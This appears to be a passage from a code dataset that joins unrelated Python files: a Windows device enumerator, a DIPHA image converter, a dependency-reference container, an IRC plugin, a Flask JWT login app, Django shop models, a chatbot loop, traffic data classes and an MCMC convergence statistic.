_ = CM_Reenumerate_DevNode_Ex(device_handle, 0, machine_handle)
class DeviceManager(object):
def __init__(self):
super(DeviceManager, self).__init__()
self._dis_list = []
def __repr__(self):
return "<DeviceManager>"
@contextmanager
def _open_handle(self, guid_string):
dis = None
try:
dis = functions.SetupDiGetClassDevs(guid_string)
yield dis
finally:
if dis is not None:
functions.SetupDiDestroyDeviceInfoList(dis)
def get_devices_from_handle(self, handle):
devices = []
for devinfo in functions.SetupDiEnumDeviceInfo(handle):
try:
instance_id = functions.SetupDiGetDeviceProperty(handle, devinfo, properties.DEVPKEY_Device_InstanceId)
except:
logger.exception("failed to get DEVPKEY_Device_InstanceId from device {!r} by handle {!r}".format(handle, devinfo))
continue
devices.append(Device(instance_id.python_object))
return devices
@property
def all_devices(self):
with self._open_handle(None) as handle:
return self.get_devices_from_handle(handle)
@property
def disk_drives(self):
disk_drives = []
for controller in self.storage_controllers:
def match_class_guid(device):
try:
return device.class_guid == constants.GENDISK_GUID_STRING
except:
return False
disk_drives.extend(filter(match_class_guid, controller.children))
return disk_drives
@property
def storage_controllers(self):
with self._open_handle(constants.SCSIADAPTER_GUID_STRING) as handle:
return self.get_devices_from_handle(handle)
@property
def scsi_devices(self):
devices = []
with self._open_handle(constants.SCSIADAPTER_GUID_STRING) as handle:
storage_controllers = self.get_devices_from_handle(handle)
for controller in storage_controllers:
if not controller.has_property("children"):
continue
devices.extend(controller.children)
return devices
@property
def volumes(self):
with self._open_handle(constants.GENVOLUME_GUID_STRING) as handle:
return self.get_devices_from_handle(handle)
@property
def root(self):
return Device(ROOT_INSTANCE_ID)
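# Illustrative usage sketch (added, not part of the original module): enumerate
# disk drives through the DeviceManager.  This only runs when the module is
# executed directly, and only on a Windows machine with the setupapi bindings.
if __name__ == "__main__":
    device_manager = DeviceManager()
    for disk in device_manager.disk_drives:
        # repr() falls back to the description when friendly_name is missing
        print(repr(disk))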
|
StarcoderdataPython
|
8137
|
import sys
from matplotlib import image as mpimg
import numpy as np
import os
DIPHA_CONST = 8067171840
DIPHA_IMAGE_TYPE_CONST = 1
DIM = 3
input_dir = os.path.join(os.getcwd(), sys.argv[1])
dipha_output_filename = sys.argv[2]
vert_filename = sys.argv[3]
input_filenames = [name
for name in os.listdir(input_dir)
if (os.path.isfile(input_dir + '/' + name)) and (name != ".DS_Store")]
input_filenames.sort()
image = mpimg.imread(os.path.join(input_dir, input_filenames[0]))
nx, ny = image.shape
del image
nz = len(input_filenames)
print(nx, ny, nz)
#sys.exit()
im_cube = np.zeros([nx, ny, nz])
i = 0
for name in input_filenames:
sys.stdout.flush()
print(i, name)
fileName = input_dir + "/" + name
im_cube[:, :, i] = mpimg.imread(fileName)
i = i + 1
print('writing dipha output...')
with open(dipha_output_filename, 'wb') as output_file:
# this is needed to verify you are giving dipha a dipha file
np.int64(DIPHA_CONST).tofile(output_file)
# this tells dipha that we are giving an image as input
np.int64(DIPHA_IMAGE_TYPE_CONST).tofile(output_file)
# number of points
np.int64(nx * ny * nz).tofile(output_file)
# dimension
np.int64(DIM).tofile(output_file)
# pixels in each dimension
np.int64(nx).tofile(output_file)
np.int64(ny).tofile(output_file)
np.int64(nz).tofile(output_file)
# pixel values
for k in range(nz):
sys.stdout.flush()
print('dipha - working on image', k)
for j in range(ny):
for i in range(nx):
val = int(-im_cube[i, j, k]*255)
'''
if val != 0 and val != -1:
print('val check:', val)
'''
np.float64(val).tofile(output_file)
output_file.close()
print('writing vert file')
with open(vert_filename, 'w') as vert_file:
for k in range(nz):
sys.stdout.flush()
print('verts - working on image', k)
for j in range(ny):
for i in range(nx):
vert_file.write(str(i) + ' ' + str(j) + ' ' + str(k) + ' ' + str(int(-im_cube[i, j, k] * 255)) + '\n')
vert_file.close()
print(nx, ny, nz)
|
StarcoderdataPython
|
4812025
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
pip_services3_commons.refer.References
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References component implementation
:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import threading
from typing import List, Any, Sequence
from .IReferences import IReferences
from .Reference import Reference
from .ReferenceException import ReferenceException
class References(IReferences):
"""
The most basic implementation of :class:`IReferences <pip_services3_commons.refer.IReferences.IReferences>` to store and locate component references.
Example:
.. code-block:: python
class MyController(IReferenceable):
_persistence = None
def set_references(self, references):
self._persistence = references.getOneRequired(Descriptor("mygroup", "persistence", "*", "*", "1.0"))
persistence = MyMongoDbPersistence()
references = References.from_tuples(
Descriptor("mygroup", "persistence", "mongodb", "default", "1.0"), persistence,
Descriptor("mygroup", "controller", "default", "default", "1.0"), controller)
controller.set_references(references)
"""
__lock = None
def __init__(self, tuples: Sequence[Any] = None):
"""
Creates a new instance of references and initializes it with references.
:param tuples: (optional) a list of values where odd elements are locators
and the following even elements are component references
"""
self._references: List[Reference] = []
self.__lock = threading.Lock()
if not (tuples is None):
index = 0
while index < len(tuples):
if index + 1 >= len(tuples):
break
self.put(tuples[index], tuples[index + 1])
index = index + 2
def put(self, locator: Any = None, component: Any = None):
"""
Puts a new reference into this reference map.
        :param locator: a locator to find the reference by.
        :param component: a component reference to be added.
"""
if component is None:
raise Exception("Component cannot be null")
self.__lock.acquire()
try:
self._references.append(Reference(locator, component))
finally:
self.__lock.release()
def remove(self, locator: Any) -> Any:
"""
Removes a previously added reference that matches specified locator.
If many references match the locator, it removes only the first one.
When all references shall be removed, use :func:`remove_all` method instead.
:param locator: a locator to remove reference
:return: the removed component reference.
"""
if locator is None:
return None
self.__lock.acquire()
try:
for reference in reversed(self._references):
if reference.match(locator):
self._references.remove(reference)
return reference.get_component()
finally:
self.__lock.release()
return None
def remove_all(self, locator: Any) -> List[Any]:
"""
Removes all component references that match the specified locator.
:param locator: a locator to remove reference by.
:return: a list, containing all removed references.
"""
components = []
if locator is None:
return components
self.__lock.acquire()
try:
for reference in reversed(self._references):
if reference.match(locator):
self._references.remove(reference)
components.append(reference.get_component())
finally:
self.__lock.release()
return components
def get_all_locators(self) -> List[Any]:
"""
Gets locators for all registered component references in this reference map.
:return: a list with component locators.
"""
locators = []
self.__lock.acquire()
try:
for reference in self._references:
locators.append(reference.get_locator())
finally:
self.__lock.release()
return locators
def get_all(self) -> List[Any]:
"""
Gets all component references registered in this reference map.
:return: a list with component references.
"""
components = []
self.__lock.acquire()
try:
for reference in self._references:
components.append(reference.get_component())
finally:
self.__lock.release()
return components
def get_optional(self, locator: Any) -> List[Any]:
"""
Gets all component references that match specified locator.
:param locator: the locator to find references by.
:return: a list with matching component references or empty list if nothing was found.
"""
try:
return self.find(locator, False)
except Exception as ex:
return []
def get_required(self, locator: Any) -> List[Any]:
"""
Gets all component references that match specified locator.
        At least one component reference must be present. If it isn't, the method throws an error.
:param locator: the locator to find references by.
:return: a list with matching component references.
:raises: a :class:`ReferenceException <pip_services3_commons.refer.ReferenceException.ReferenceException>` when no references found.
"""
return self.find(locator, True)
def get_one_optional(self, locator: Any) -> Any:
"""
Gets an optional component reference that matches specified locator.
:param locator: the locator to find references by.
:return: a matching component reference or null if nothing was found.
"""
try:
components = self.find(locator, False)
return components[0] if len(components) > 0 else None
except Exception as ex:
return None
def get_one_required(self, locator: Any) -> Any:
"""
        Gets a required component reference that matches specified locator.
:param locator: the locator to find a reference by.
:return: a matching component reference.
:raises: a :class:`ReferenceException <pip_services3_commons.refer.ReferenceException.ReferenceException>` when no references found.
"""
components = self.find(locator, True)
return components[0] if len(components) > 0 else None
def find(self, locator: Any, required: bool) -> List[Any]:
"""
Gets all component references that match specified locator.
:param locator: the locator to find a reference by.
:param required: forces to raise an error if no reference is found.
:return: a list with matching component references.
        :raises: a :class:`ReferenceException <pip_services3_commons.refer.ReferenceException.ReferenceException>` when required is set to true but no references are found.
"""
if locator is None:
raise Exception("Locator cannot be null")
components = []
self.__lock.acquire()
try:
index = len(self._references) - 1
while index >= 0:
reference = self._references[index]
if reference.match(locator):
component = reference.get_component()
components.append(component)
index = index - 1
if len(components) == 0 and required:
raise ReferenceException(None, locator)
finally:
self.__lock.release()
return components
@staticmethod
def from_tuples(*tuples: Any) -> 'References':
"""
        Creates a new References from a list of key-value pairs called tuples.
:param tuples: a list of values where odd elements are locators
and the following even elements are component references
:return: a newly created References.
"""
return References(tuples)
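if __name__ == "__main__":
    # Illustrative sketch (added, not part of the original module): plain strings
    # are used as locators here purely for brevity, assuming Reference.match
    # compares such locators by equality; real services normally register
    # components under Descriptor locators as shown in the class docstring.
    refs = References.from_tuples("persistence", object(), "controller", object())
    print(refs.get_all_locators())              # ['persistence', 'controller']
    print(refs.get_one_required("controller"))  # the registered component object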
|
StarcoderdataPython
|
8158851
|
<reponame>Martin-Jia/words-app<filename>app.py
from flask import Flask, request
import logging
from flask_httpauth import HTTPBasicAuth, HTTPTokenAuth
from threading import Timer
import random
import string
import datetime
from Utils.constants import Constants, ErrorCode, ErrorMessage
import jwt
from Utils.db_helper import DatabaseConnector
logger = logging.getLogger("restfulapi")
app = Flask(__name__)
auth = HTTPTokenAuth(scheme='Bearer')
cur_salt = {}  # {'salt': salt string, 'expire': utc timestamp (seconds)}
db_connector = DatabaseConnector()
def gen_salt(salt_len):
return ''.join(random.sample(string.ascii_letters + string.digits, salt_len))
def set_salt():
cur_salt['salt'] = gen_salt(Constants.SALT_LEN)
cur_salt['expire'] = datetime.datetime.utcnow().timestamp() + Constants.SALT_EXPIRE_TIME
set_salt()
Timer(Constants.SALT_EXPIRE_TIME, set_salt).start()
def pack(error_code, error_msg, data):
return {
'error_code': error_code,
'error_msg': error_msg,
'data': data
}
@app.route('/get_salt')
def get_salt():
return pack('', '', cur_salt)
@auth.verify_token
def verify_token(token):
try:
body = jwt.decode(token, Constants.CONST_SALT, algorithms=["HS256"])
username = body['username']
token = body['token']
err, token_col = db_connector.query_user_token(username)
cur_time = datetime.datetime.utcnow().timestamp()
if err or not token_col:
logger.warn('wrong token')
return None
        if token == token_col.get('token') and \
                cur_time < token_col.get('expire_time', 0):
db_connector.update_user_token(username, token, cur_time + Constants.TOKEN_EXPIRE_TIME)
return username
return None
except jwt.exceptions.InvalidTokenError:
return None
except KeyError:
return None
@app.route('/login', methods=["POST"])
def login():
data = request.get_data()
salt = cur_salt.get('salt', '')
if salt == '':
logger.error('salt empty')
return pack(ErrorCode.INTERNEL_ERROR, ErrorMessage.INTERNEL_ERROR, '')
try:
json_body = jwt.decode(data, salt, algorithms=["HS256"])
username = json_body['username']
password = json_body['password']
except jwt.exceptions.InvalidTokenError:
return pack(ErrorCode.INVALID_SALT, ErrorMessage.INVALID_SALT, '')
except KeyError:
return pack(ErrorCode.INVALID_BODY, ErrorMessage.INVALID_BODY, '')
err, user = db_connector.query_user_with_username(username)
if err or not user:
        return pack(ErrorCode.INVALID_USERNAME, ErrorMessage.INVALID_USERNAME, None)
if password == user.get('password'):
token = gen_salt(Constants.SALT_LEN)
expire_time = datetime.datetime.utcnow().timestamp() + Constants.TOKEN_EXPIRE_TIME
db_connector.update_user_token(username, token, expire_time)
ret = {
'data': {
'username': username,
'token': token
}
}
return pack('', '', jwt.encode(ret, Constants.CONST_SALT, algorithm="HS256"))
    return pack(ErrorCode.WRONG_PASSWORD, ErrorMessage.WRONG_PASSWORD, None)
@app.route('/logout')
@auth.login_required
def logout():
username = auth.current_user()
if not username:
return pack(ErrorCode.LOGIN_NEEDED, ErrorMessage.LOGIN_NEEDED, None)
db_connector.clear_user_token(username)
return pack(None, None, 'logged out')
@app.route('/')
def test():
return 'hello world'
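# Illustrative client-side sketch (added, not part of the original app): shows
# how a caller would build the body expected by the /login endpoint, encoding
# the username/password claims with the salt fetched from /get_salt.  The
# helper name is made up for this example.
def _build_login_payload(username, password, salt):
    return jwt.encode({'username': username, 'password': password}, salt, algorithm="HS256")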
|
StarcoderdataPython
|
9707897
|
from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
# Create your models here.
class Product(models.Model):
category = models.ManyToManyField('products.ProductCategory', related_name='product_category')
tag = models.ManyToManyField('products.Tag', related_name='product_tags')
title = models.CharField(max_length=50)
description = RichTextUploadingField()
cover_image = models.ImageField(upload_to="product_cover_images", null=True, blank=True)
old_price = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)
price = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)
is_published = models.BooleanField(default=False)
view_count = models.IntegerField(default=0)
def get_quantity(self, obj):
p_versions = obj.product_version.all()
q = 0
for e in p_versions:
q += e.quantity
return q
def get_stock(self, obj):
stock = 'Not available'
count = 0
for elem in obj.product_version.all():
if elem.quantity != 0:
count += 1
if count > 0:
stock = 'True'
return stock
def __str__(self) -> str:
return self.title
class ProductVersion(models.Model):
product = models.ForeignKey('products.Product', related_name='product_version', on_delete=models.CASCADE)
size = models.ManyToManyField('products.Size', related_name='product_size', blank=True)
color = models.ManyToManyField('products.Color', related_name='product_color', blank=True)
quantity = models.IntegerField()
def get_stock(self, obj):
stock = 'True'
if obj.quantity == 0:
stock = "Not available"
return stock
def __str__(self) -> str:
return f'{self.product}, Size: {self.size.all()[0]}, Color: {self.color.all()[0]}'
class ProductCategory(models.Model):
"""
This model contains all products' categories and subcategories.
"""
parent = models.ForeignKey('self', on_delete=models.CASCADE, null=True, blank=True, related_name='categories')
title = models.CharField(max_length=50)
def __str__(self) -> str:
if self.parent:
return f'{self.parent} > {self.title}'
return self.title
class Meta:
verbose_name = "Product Category"
verbose_name_plural = 'Product Categories'
class Size(models.Model):
"""
    This model contains all products' sizes.
"""
size = models.CharField(max_length=10)
def __str__(self) -> str:
return self.size
class Color(models.Model):
"""
This model contains all products' colors
"""
color = models.CharField(max_length=50)
def __str__(self) -> str:
return self.color
class Tag(models.Model):
"""
This model contains all products' tags.
"""
tag = models.CharField(max_length=50)
def __str__(self) -> str:
return self.tag
class Image(models.Model):
"""
This model contains photos which related with the products
"""
product = models.ForeignKey("Product", on_delete=models.CASCADE, null=True, blank=True, related_name="product_image")
image = models.ImageField(upload_to="product_images", null=True, blank=True)
def __str__(self) -> str:
return f'{self.product}'
class Review(models.Model):
"""
This model contains reviews for each products
"""
product = models.ForeignKey("Product", on_delete=models.CASCADE, null=True, blank=True, related_name="product_reviews")
RATES =[
(1, "20"),
(2, "40"),
(3, "60"),
(4, "80"),
(5, "100"),
]
value_rate = models.IntegerField(choices=RATES)
quality_rate = models.IntegerField(choices=RATES)
price_rate = models.IntegerField(choices=RATES)
nickname = models.CharField(max_length=50)
summary = models.CharField(max_length=100)
review = models.CharField(max_length=500)
def __str__(self) -> str:
return self.summary
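# Illustrative ORM sketch (added, not part of the original models module): the
# field and model names match the definitions above, the helper name itself is
# made up, and the query only works inside a configured Django project.
def published_products_in_category(category_title):
    return Product.objects.filter(is_published=True, category__title=category_title)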
|
StarcoderdataPython
|
3428170
|
<gh_stars>1-10
helpstring = "voiceme"
arguments = ["self", "info", "args"]
minlevel = 3
def main(connection, info, args) :
"""Voices the sender"""
connection.rawsend("MODE %s +v %s\n" % (info["channel"], info["sender"]))
|
StarcoderdataPython
|
4819184
|
<reponame>jerroydmoore/YARB
'''
Agent
Created on Jan 28, 2011
@author: yangwookkang
'''
import time
import utils
import sys
from nlu.NLparser import NLparser
from nlg.NLgenerator import NLgenerator
from dm.dialogmanager import DialogManager
from datetime import date
from dm.imdb_wrapper import IMDBWrapper
from dm.localdb_wrapper import LocalDBWrapper
from nlu.entity import EntitySet
class Agent:
def __init__(self, verbose = False):
# load modules
# NLU, DB connection test
self.nlu = NLparser(verbose)
# verbose true for DM and NLG
verbose = True
self.dm = DialogManager(verbose)
self.nlg = NLgenerator(verbose)
self.sessionid = date.strftime(date.today(),"%y%m%d") + "_" + time.strftime("%H%M%S")
self.logger = utils.ConsoleAndFileLogger(self.sessionid)
def run(self):
self.logger.log("Hello. I am YARB (Yet Another Recommendation Bot).")
self.logger.log("Please tell me your name.")
usermsg = raw_input("> ")
self.logger.logtofile("> " + usermsg)
if (self.dm.processUserName(usermsg) == 1):
self.logger.log("Welcome back, " + usermsg + ".")
else:
self.logger.log("Nice to meet you, " + usermsg + ".")
self.logger.log("If you'd like a recommendation, please tell\nme about what you like or dislike.")
self.dm.loadOptions()
while not self.dm.sessionclosed():
usermsg = raw_input("> ")
self.logger.logtofile("> " + usermsg)
if usermsg == "":
continue
nluoutput = self.nlu.process(usermsg) # NLU
for output in nluoutput:
dmoutput = self.dm.process(output) # DM
#dmoutput = self.dm.process(nluoutput)
response = self.nlg.process(dmoutput) # NLG
self.logger.log(response)
self.dm.saveUserPreferences()
self.logger.log("Session closed [id = {0:s}].".format(self.sessionid))
def test(self, inputfilename):
print 'reading: ' + inputfilename
infile = open(inputfilename, 'r')
num = 1
breakpoint = 29
print 'processing... classifier: trivia'
for line in infile:
# NLU process
input = line.strip()
#print input
nluoutput = self.nlu.process(input) # NLU
#if num != breakpoint and nluoutput.get_classifier() != "userPreference":
# num = num + 1
# continue
#if breakpoint == num:
#print str(num) + ". " + line.replace('\\','') + " --> " + nluoutput.get_classifier() + " , [", nluoutput.tostr_entities(), "]"
#if nluoutput.get_classifier() == "trivia":
print str(num) + ". " + input
dmoutput = self.dm.process(nluoutput)
msg = self.nlg.process(dmoutput)
print "> " + msg
print
num = num + 1
def test_db():
IMDBWrapper()
pass
# main function
if __name__ == '__main__':
#test_db()
#Agent().test("./corpus1.txt")
Agent().run()
"""
# imdb test
localdb = LocalDBWrapper()
localdb.load_preference("ywkang")
#localdb.add_preference("genre", "Comedy", 4)
print localdb.get_preference()
db = IMDBWrapper()
entities = EntitySet("dummy")
db.get_recommendation(entities, localdb.get_preference())
"""
|
StarcoderdataPython
|
6700794
|
'''
Created on Jan 10, 2012
@author: tjhunter
All the data structures as used in the python files.
'''
class Coordinate(object):
""" A geolocation representation.
"""
def __init__(self, lat, lng):
self.lat = lat
self.lon = lng
def __eq__(self, other):
return self.lat == other.lat and self.lon == other.lon
def __ne__(self, other):
return not self.__eq__(other)
class Spot(object):
""" Spot representation.
"""
def __init__(self, link_id, offset, coordinate=None):
self.linkId = link_id
self.offset = offset
self.coordinate = coordinate
def __eq__(self, other):
return self.linkId == other.linkId and int(10 * self.offset) == int(10 * other.offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "Spot[%s, %.1f]" % (str(self.linkId), self.offset)
class Route(object):
""" Representation of a netconfig.Route
"""
def __init__(self, links, spots, geometry=None):
self.link_ids = links
self.spots = spots
self.geometry = geometry
#self.length = sum([link.length for link in self.link_ids[:-1]]) - self.firstSpot.offset + self.lastSpot.offset
@property
def firstSpot(self):
return self.spots[0]
@property
def lastSpot(self):
return self.spots[-1]
@staticmethod
def fromPair(links, start_spot, end_spot):
        return Route(links, [start_spot, end_spot])
def __repr__(self):
return "Route[%s,link_ids=%s,%s]" % (str(self.firstSpot), str(self.link_ids), str(self.lastSpot))
class TSpot(object):
""" A timed spot.
"""
def __init__(self, spot, vehicle_id, time,
hired=None, speed=None, obsCoordinate=None):
self.spot = spot
self.id = vehicle_id
self.time = time
self.hired = hired
self.speed = speed
self.obsCoordinate = obsCoordinate
def __repr__(self):
return "TSpot[%s,%s, %s]" % (str(self.spot), str(self.time), str(self.id))
class RouteTT(object):
""" Python representation of the RouteTT object
"""
def __init__(self, route, start_time, end_time, vehicle_id=None):
self.route = route
self.startTime = start_time
self.endTime = end_time
self.id = vehicle_id
self.tt = (self.endTime - self.startTime).total_seconds()
#self.vel = self.route.length / self.tt
def __repr__(self):
return "RouteTT[%s, %s, %s, %s]" % (str(self.id), str(self.startTime), str(self.endTime), str(self.route))
# TODO(?) rename to something else
class Point_pts(object):
""" A point in the time-space diagram associated with time, space and speed
"""
def __init__(self, space, time, speed):
self.space = space
self.time = time
self.speed = speed
class CutTrajectory(object):
""" A simplified trajectory for the stop/go model.
"""
def __init__(self, rtts):
"""
Arguments:
- rtts: list of RouteTT objects
"""
self.pieces = rtts
self.numPieces = len(self.pieces)
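# Illustrative sketch (added, not part of the original module): building a Route
# from two Spots; the link ids and offsets below are made-up values.
def _demo_route():
    first = Spot(link_id=1, offset=0.0)
    last = Spot(link_id=3, offset=12.5)
    return Route(links=[1, 2, 3], spots=[first, last])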
|
StarcoderdataPython
|
6457591
|
<reponame>fei-protocol/checkthechain
from .crud import *
|
StarcoderdataPython
|
6551233
|
<gh_stars>1-10
from random import *
from math import *
def rumus (x1, x2) :
return ((2 * (pow(x1,2)) + pow(x2,4)/3) * (pow(x1,2)))-(x1 * x2) + (4 * (pow(x2,2)) * (pow(x2,2)))
def rand () :
return uniform(-1,1)
def key (dE, T) :
return exp(-dE/T)
x1 = rand()
x2 = rand()
CurrentState = rumus(x1,x2)
BSF = CurrentState
Tawal = 2000000000000
Takhir = 0.000001
CoolingRate = 0.9999
while Tawal > Takhir :
x1 = rand()
x2 = rand()
NewState = rumus(x1, x2)
dE = NewState - CurrentState
if dE < 0 :
Bx1 = x1
Bx2 = x2
CurrentState = NewState
BSF = NewState
else:
R = random()
if key(dE, Tawal) > R :
Bx1 = x1
Bx2 = x2
CurrentState = NewState
BSF = NewState
Tawal = Tawal * CoolingRate
print ("x1 = ", Bx1, "x2 = ", Bx2)
print ("BSF = ", BSF)
|
StarcoderdataPython
|
3207711
|
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
from joblib import load
pipeline = load('assets/pipeline.joblib')
import pandas as pd
@app.callback(
Output('prediction-content', 'children'),
[#Input('completions_per_year', 'value'), Input('wins_per_year', 'value'), Input('height', 'value'),
#Input('forty_yard_dash', 'value')],
Input('games_played', 'value'), Input('passing_completions', 'value'), Input('passing_attempts', 'value'),
Input('passing_percentage', 'value'), Input('passing_yards', 'value'), Input('passing_tds', 'value'),
Input('passing_ints', 'value'), Input('passer_rating', 'value'), Input('passes_per_year', 'value'),
Input('completions_per_year', 'value'), Input('yards_per_year', 'value'), Input('tds_per_year', 'value'),
Input('ints_per_year', 'value'), Input('height', 'value'), Input('weight', 'value'),
Input('forty_yard_dash', 'value'), Input('vert_leap', 'value'), Input('broad_jump', 'value'),
Input('shuttle_run', 'value'), Input('three_cone', 'value'), Input('no_combine_attendance', 'value'),
Input('power_five_conf', 'value'), Input('conference_championships', 'value'), Input('wins_per_year', 'value')],
)
def predict(#completions_per_year, wins_per_year, height, forty_yard_dash):
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year):
df = pd.DataFrame(
columns=[#'completions_per_year','wins_per_year','height','forty_yard_dash'],
'games_played','passing_completions','passing_attempts',
'passing_percentage','passing_yards','passing_tds','passing_ints',
'passer_rating','passes_per_year','completions_per_year','yards_per_year',
'tds_per_year','ints_per_year','height','weight','forty_yard_dash',
'vert_leap','broad_jump','shuttle_run','three_cone','no_combine_attendance',
'power_five_conf','conference_championships','wins_per_year'],
data=[[#completions_per_year, wins_per_year, height, forty_yard_dash]]
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year]]
)
y_pred = pipeline.predict(df)[0]
return html.H1(f'{y_pred:.0f} Starts')
# 2 column layout. 1st column width = 4/12
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Predictions
Input the college stats of the quarterback that you would like to predict.
"""
),
dcc.Markdown('#### Completions per Year'),
dcc.Input(
id='completions_per_year',
placeholder='AVG: 178',
type='number',
value=178
),
dcc.Markdown('#### Passing Yards per Season'),
dcc.Input(
id='yards_per_year',
placeholder='AVG: 2194',
type='number',
value=2194
),
dcc.Markdown('#### Passes per Year'),
dcc.Input(
id='passes_per_year',
placeholder='AVG: 211',
type='number',
value=211
),
dcc.Markdown('#### Passing TDs per Season'),
dcc.Input(
id='tds_per_year',
placeholder='AVG: 15',
type='number',
value=15
),
dcc.Markdown('#### Interceptions per Season'),
dcc.Input(
id='ints_per_year',
placeholder='AVG: 8',
type='number',
value=8
),
dcc.Markdown('#### Height (in)'),
dcc.Input(
id='height',
placeholder='AVG: 74',
type='number',
value=74
),
dcc.Markdown('#### Weight (lb)'),
dcc.Input(
id='weight',
placeholder='AVG: 222 lbs',
type='number',
value=222
),
dcc.Markdown('#### 40 Time'),
dcc.Input(
id='forty_yard_dash',
placeholder='AVG: 4.87 Seconds',
type='number',
value=4.87
),
dcc.Markdown('#### Vertical Leap (in)'),
dcc.Input(
id='vert_leap',
placeholder='AVG: 24 inches',
type='number',
value=24
),
dcc.Markdown('#### 3-Cone Drill'),
dcc.Input(
id='three_cone',
placeholder='AVG: 7.34 Seconds',
type='number',
value=7.34
),
dcc.Markdown('#### Broad Jump'),
dcc.Input(
id='broad_jump',
placeholder='AVG: 106 inches',
type='number',
value=106
),
dcc.Markdown('#### Shuttle Run'),
dcc.Input(
id='shuttle_run',
placeholder='AVG: 4.46 Seconds',
type='number',
value=4.46
),
],
md=4,
)
column2 = dbc.Col(
[
dcc.Markdown('#### Games Played'),
dcc.Input(
id='games_played',
placeholder='AVG: 32 Games',
type='number',
value=32
),
dcc.Markdown('#### Total Passing Completions'),
dcc.Input(
id='passing_completions',
placeholder='AVG: 563',
type='number',
value=563
),
dcc.Markdown('#### Total Passing Attempts'),
dcc.Input(
id='passing_attempts',
placeholder='AVG: 939',
type='number',
value=939
),
dcc.Markdown('#### Career Passing Percentage'),
dcc.Input(
id='passing_percentage',
placeholder='AVG: 59.2',
type='number',
value=59.2
),
dcc.Markdown('#### Total Passing Yards'),
dcc.Input(
id='passing_yards',
placeholder='AVG: 6900',
type='number',
value=6900
),
dcc.Markdown('#### Total Passing TDs'),
dcc.Input(
id='passing_tds',
placeholder='AVG: 49',
type='number',
value=49
),
dcc.Markdown('#### Total Interceptions'),
dcc.Input(
id='passing_ints',
placeholder='AVG: 26',
type='number',
value=26
),
dcc.Markdown('#### Career Passer Rating'),
dcc.Input(
id='passer_rating',
placeholder='AVG: 131',
type='number',
value=131
),
dcc.Markdown('#### Wins per Year'),
dcc.Slider(
id='wins_per_year',
min=0,
max=12,
        step=1,
value=5,
marks={n: str(n) for n in range(0,13,1)},
className='mb-5',
),
dcc.Markdown('#### Conference Championships Won'),
dcc.Slider(
id='conference_championships',
min=0,
max=4,
        step=1,
value=0,
marks={n: str(n) for n in range(0,5,1)},
className='mb-5',
),
dcc.Markdown('#### Attended Combine'),
dcc.Dropdown(
id='no_combine_attendance',
options = [
{'label': 'Yes', 'value': 0},
{'label': 'No', 'value': 1},
],
value = 0,
className='mb-5',
),
dcc.Markdown('#### Power 5 Conference'),
dcc.Dropdown(
id='power_five_conf',
options = [
{'label': 'Yes', 'value': 1},
{'label': 'No', 'value': 0},
],
value = 1,
className='mb-5',
),
],
md=4,
)
column3 = dbc.Col(
[
html.H2('Expected NFL Starts per Season', className='mb-5'),
html.Div(id='prediction-content', className='lead')
]
)
layout = dbc.Row([column1, column2, column3])
|
StarcoderdataPython
|
1855652
|
<reponame>bmorris3/mosfire_wasp6
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 31 08:56:57 2015
@author: bmmorris
"""
import numpy as np
from matplotlib import pyplot as plt
def gelmanrubin(samples, **kwargs):
'''
The Gelman-Rubin (1992) statistic R-hat.
Parameters
----------
samples : array-like
Array of MCMC links for each parameter
plot : bool
If `plot`=True, draw a bar plot of the R-hats
labels : list of strings
If `plot`=True, label each bar on the bar plot
with the names in the list `labels`. Otherwise,
use indices as labels.
Returns
-------
Rhat : float
The Gelman-Rubin R-hat statistic, approaches unity after infinite
steps of a well-mixed chain.
'''
n, m = np.shape(samples)
Rhats = np.zeros(m)
for j in range(m):
individualchains = [samples[i:, j][::2*m] for i in range(2*m)]
# W = mean of within-chain variance
W = np.mean([np.var(chain, ddof=1) for chain in individualchains])
# B = between chain variance
B = n*np.var([np.mean(chain) for chain in individualchains], ddof=1)
Vhat = W*(n-1)/n + B/n
Rhats[j] = np.sqrt(Vhat/W)
if kwargs.get('plot', False):
if kwargs.get('labels', False):
labels = kwargs.get('labels')
else:
labels = range(m)
fig, ax = plt.subplots(1, figsize=(16,5))
ax.bar(np.arange(len(labels))-0.5, Rhats, color='k')
ax.set_xticks(range(len(labels)))
ax.set_xticklabels(labels, ha='right')
[l.set_rotation(45) for l in ax.get_xticklabels()]
ax.set_ylim([0.9, np.max(Rhats)])
ax.set_xlim([-1, len(labels)+1])
ax.set_ylabel('$\hat{R}$')
ax.set_title('Gelman-Rubin Statistic')
plt.show()
return Rhats
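# Usage sketch (illustrative values): `samples` is an (n_steps, n_params) array of
# MCMC draws, so for a chain with three fitted parameters one might call
#   rhats = gelmanrubin(chain, plot=True, labels=['param_a', 'param_b', 'param_c'])
# Values close to 1 indicate the chains are well mixed.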
def chi2(v1, v2, err, Nfreeparams):
return np.sum( ((v1-v2)/err)**2 )/(len(v1) - Nfreeparams)
def medplusminus(vector):
'''
Returns the 50%ile, the difference between the 84%ile and 50%ile, and
the difference between the 50%ile and the 16%ile, representing
the median and the +/-1 sigma samples.
Parameters
----------
vector : array-like
Vector of MCMC samples for one fitting parameter
'''
v = np.percentile(vector, [16, 50, 84])
return v[1], v[2]-v[1], v[1]-v[0]
|
StarcoderdataPython
|
3286631
|
<gh_stars>1-10
def sum_finding_dfs(nums, target):
